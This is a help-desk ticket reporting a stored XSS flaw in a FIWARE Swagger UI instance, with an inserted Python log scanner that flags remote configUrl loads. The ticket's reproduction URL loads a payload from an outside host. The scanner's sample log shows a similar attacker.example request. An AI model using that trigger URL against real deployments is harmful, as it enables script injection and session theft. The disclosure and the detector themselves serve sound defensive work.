Help-Desk / HELP-21868

[Fiware-tech-help] Bug Report: Swagger UI XSS Vulnerability

    Details

    • Type: extRequest
    • Status: Open
    • Priority: Major
    • Resolution: Unresolved
    • Fix Version/s: None
    • Component/s: FIWARE-TECH-HELP
    • Labels: None
    • HD-Chapter: Unknown
    • HD-Enabler: Unknown
    • HD-Node: Unknown

      Description

      Summary:
      Hello team,
      I am a security researcher and I would like to report a security
      vulnerability in the Swagger UI site that allows for stored cross-site
      scripting (XSS) attacks.
      By accessing the Swagger UI instance through the provided URL, an attacker
      can execute arbitrary JavaScript code and trigger a popup, indicating the
      presence of an XSS vulnerability.
      Severity: High

      Steps to Reproduce:
      1) Open a web browser.
      2) Access the following URL:
      https://swagger.lab.fiware.org/?configUrl=https://xss.smarpo.com/test.json
      3) Once the Swagger UI page loads, observe that an XSS payload is executed
      automatically, resulting in a popup.

      Expected Behavior:
      The Swagger UI instance should sanitize and handle user-supplied input
      securely, preventing the execution of any malicious code.

      Actual Behavior:
      The Swagger UI instance is vulnerable to XSS attacks, allowing for the
      execution of arbitrary JavaScript code. This is evident from the automatic
      execution of a payload that triggers a popup.

      Impact:
      The exploitation of this vulnerability could lead to various security
      risks, including but not limited to:

      • Theft of sensitive information (e.g., cookies, session tokens)
      • Unauthorized actions on behalf of authenticated users
      • Phishing attacks by tricking users into disclosing personal information
      • Defacement of the Swagger UI interface
      • Disruption of service availability

      Read more here:
      https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

      Recommendation:
      I recommend addressing this XSS vulnerability by implementing proper input
      sanitization and output encoding mechanisms within the Swagger UI codebase.
      Additionally, it is crucial to regularly update and patch Swagger UI with
      the latest security fixes to mitigate potential risks.

      PoC: please find the screenshot attached below.


      Thanks & Regards
      Arjith N R

      __________________________________________________________________________________________

      fiware-tech-help mailing list
      fiware-tech-help@lists.fiware.org

      To unsubscribe from fiware-tech-help mailing list, go to the information page of the list at:
      https://lists.fiware.org/listinfo/fiware-tech-help

      [Created via e-mail received from: Arjith <arjithnr@gmail.com>]
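A defender-side check, added here as an example and not part of the report above or of Swagger UI itself: it scans constructed web-server access-log lines for requests whose `configUrl` or `url` query parameter points at a host outside an assumed allowlist, which is the mechanism the reproduction step relies on (a remote document supplied through the query string). The allowlist, the log lines and the `attacker.example` host are all assumptions made for this example.

```python
"""Flag Swagger UI requests that pull a remote document from an unexpected host.
Constructed example; the allowlist and log lines below are not from the ticket."""
import re
from urllib.parse import urlsplit, parse_qs

# Hosts this deployment legitimately loads OpenAPI documents/configs from (assumed).
ALLOWED_SPEC_HOSTS = {"swagger.lab.fiware.org"}

# Swagger UI query parameters that make the page fetch a remote document.
REMOTE_FETCH_PARAMS = ("configUrl", "url")

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def external_spec_refs(request_target):
    """Return (param, value) pairs whose value names a host outside the allowlist."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    findings = []
    for param in REMOTE_FETCH_PARAMS:
        for value in query.get(param, []):
            host = urlsplit(value).hostname  # also resolves scheme-relative //host/path
            if host is None:
                continue  # relative path such as /openapi.json stays same-origin
            if host.lower() not in ALLOWED_SPEC_HOSTS:
                findings.append((param, value))
    return findings


def scan_access_log(lines):
    """Return (client_ip, param, value) for every request that references an external host."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for param, value in external_spec_refs(match.group("target")):
            hits.append((client_ip, param, value))
    return hits


# Constructed sample lines; attacker.example is a placeholder, not a real indicator.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?url=/openapi.json HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [01/Jan/2024:10:00:01 +0000] "GET /?configUrl=https://swagger.lab.fiware.org/config.json HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?configUrl=https://attacker.example/test.json HTTP/1.1" 200 512 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for client_ip, param, value in scan_access_log(SAMPLE_LOG):
        print(f"{client_ip} requested Swagger UI with external {param}={value}")
```

Only the third constructed line is reported, because a relative `url` and an allowlisted `configUrl` host are both treated as benign.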

        Activity

        There are no comments yet on this issue.

          People

          • Assignee: jason.fox Jason Fox
          • Reporter: fw.ext.user FW External User
          • Votes: 0
          • Watchers: 1
